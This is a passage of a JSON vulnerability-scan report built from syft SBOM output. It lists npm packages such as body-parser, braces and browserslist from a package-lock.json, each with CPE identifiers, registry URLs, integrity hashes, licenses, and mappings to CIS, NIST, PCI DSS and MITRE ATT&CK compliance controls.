1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7dd5ae9dd664c020", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: binary-extensions 2.3.0", "title": "binary-extensions 2.3.0", "description": "Package discovered: binary-extensions 2.3.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a472eb11fead94f4", "name": "binary-extensions", "version": "2.3.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:binary-extensions:binary-extensions:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:binary-extensions:binary_extensions:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:binary_extensions:binary-extensions:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:binary_extensions:binary_extensions:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:binary:binary-extensions:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:binary:binary_extensions:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/binary-extensions@2.3.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/binary-extensions/-/binary-extensions-2.3.0.tgz", "integrity": "sha512-Ceh+7ox5qe7LJuLHoY0feh3pHuUDHAcRUeyL2VYghZwfpkNIy/+8Ocg0a3UuSoYzavmylwuLWQOf3hl0jjMMIw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d29a5e4fb92420c3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: body-parser 1.20.5", "title": "body-parser 1.20.5", "description": "Package discovered: body-parser 1.20.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "04b33f5cfaf593a5", "name": "body-parser", "version": "1.20.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:openjsf:body-parser:1.20.5:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/body-parser@1.20.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/body-parser/-/body-parser-1.20.5.tgz", "integrity": "sha512-3grm+/2tUOvu2cjJkvsIxrv/wVpfXQW4PsQHYm7yk4vfpu7Ekl6nEsYBoJUL6qDwZUx8wUhQ8tR2qz+ad9c9OA==", "dependencies": { "bytes": "~3.1.2", "content-type": "~1.0.5", "debug": "2.6.9", "depd": "2.0.0", "destroy": "~1.2.0", "http-errors": "~2.0.1", "iconv-lite": "~0.4.24", "on-finished": "~2.4.1", "qs": "~6.15.1", "raw-body": "~2.5.3", "type-is": "~1.6.18", "unpipe": "~1.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8d245dad35d0de48", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: brace-expansion 2.1.0", "title": "brace-expansion 2.1.0", "description": "Package discovered: brace-expansion 2.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "833f3564230327b0", "name": "brace-expansion", "version": "2.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:brace-expansion:brace-expansion:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:brace-expansion:brace_expansion:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:brace_expansion:brace-expansion:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:brace_expansion:brace_expansion:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:brace:brace-expansion:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:brace:brace_expansion:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/brace-expansion@2.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.1.0.tgz", "integrity": "sha512-TN1kCZAgdgweJhWWpgKYrQaMNHcDULHkWwQIspdtjV4Y5aurRdZpjAqn6yX3FPqTA9ngHCc4hJxMAMgGfve85w==", "dependencies": { "balanced-match": "^1.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2c758a1366af3ce7", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: braces 3.0.3", "title": "braces 3.0.3", "description": "Package discovered: braces 3.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e8863a3d87ad712b", "name": "braces", "version": "3.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:braces_project:braces:3.0.3:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" }, { "cpe": "cpe:2.3:a:jonschlinkert:braces:3.0.3:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/braces@3.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", "dependencies": { "fill-range": "^7.1.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4acea70fbe4d3073", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: brotli 1.3.3", "title": "brotli 1.3.3", "description": "Package discovered: brotli 1.3.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "6bc686959e36e164", "name": "brotli", "version": "1.3.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:brotli:brotli:1.3.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/brotli@1.3.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/brotli/-/brotli-1.3.3.tgz", "integrity": "sha512-oTKjJdShmDuGW94SyyaoQvAjf30dZaHnjJ8uAF+u2/vGJkJbJPJAT1gDiOJP5v1Zb6f9KEyW/1HpuaWIXtGHPg==", "dependencies": { "base64-js": "^1.1.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "08e716a2d2fe7179", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: browserify-zlib 0.2.0", "title": "browserify-zlib 0.2.0", "description": "Package discovered: browserify-zlib 0.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "adb6ab9adab6e7b8", "name": "browserify-zlib", "version": "0.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:browserify-zlib:browserify-zlib:0.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:browserify-zlib:browserify_zlib:0.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:browserify_zlib:browserify-zlib:0.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:browserify_zlib:browserify_zlib:0.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:browserify:browserify-zlib:0.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:browserify:browserify_zlib:0.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/browserify-zlib@0.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/browserify-zlib/-/browserify-zlib-0.2.0.tgz", "integrity": "sha512-Z942RysHXmJrhqk88FmKBVq/v5tqmSkDz7p54G/MGyjMnCFFnC79XWNbg+Vta8W6Wb2qtSZTSxIGkJrRpCFEiA==", "dependencies": { "pako": "~1.0.5" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "27d8113ce8ad07e6", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: browserslist 4.28.2", "title": "browserslist 4.28.2", "description": "Package discovered: browserslist 4.28.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "4688a05ee871df84", "name": "browserslist", "version": "4.28.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:browserslist_project:browserslist:4.28.2:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/browserslist@4.28.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.28.2.tgz", "integrity": "sha512-48xSriZYYg+8qXna9kwqjIVzuQxi+KYWp2+5nCYnYKPTr0LvD89Jqk2Or5ogxz0NUMfIjhh2lIUX/LyX9B4oIg==", "dependencies": { "baseline-browser-mapping": "^2.10.12", "caniuse-lite": "^1.0.30001782", "electron-to-chromium": "^1.5.328", "node-releases": "^2.0.36", "update-browserslist-db": "^1.2.3" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4b1e259ceb7e99ec", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: buffer-equal-constant-time 1.0.1", "title": "buffer-equal-constant-time 1.0.1", "description": "Package discovered: buffer-equal-constant-time 1.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ea42e35a908d5ccd", "name": "buffer-equal-constant-time", "version": "1.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:buffer-equal-constant-time:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:buffer-equal-constant-time:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:buffer_equal_constant_time:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:buffer_equal_constant_time:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:buffer-equal-constant:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:buffer-equal-constant:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:buffer_equal_constant:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:buffer_equal_constant:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:buffer-equal:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:buffer-equal:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:buffer_equal:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:buffer_equal:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:buffer:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:buffer:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/buffer-equal-constant-time@1.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/buffer-equal-constant-time/-/buffer-equal-constant-time-1.0.1.tgz", "integrity": "sha512-zRpUiDwd/xk6ADqPMATG8vc9VPrkck7T07OIx0gnjmJAnHnTVXNQG3vfvWNuiZIkwu9KrKdA1iJKfsfTVxE6NA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "991f80bfd3038fd0", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: buffer-from 1.1.2", "title": "buffer-from 1.1.2", "description": "Package discovered: buffer-from 1.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "98e22d90241a7628", "name": "buffer-from", "version": "1.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:buffer-from:buffer-from:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:buffer-from:buffer_from:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:buffer_from:buffer-from:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:buffer_from:buffer_from:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:buffer:buffer-from:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:buffer:buffer_from:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/buffer-from@1.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": 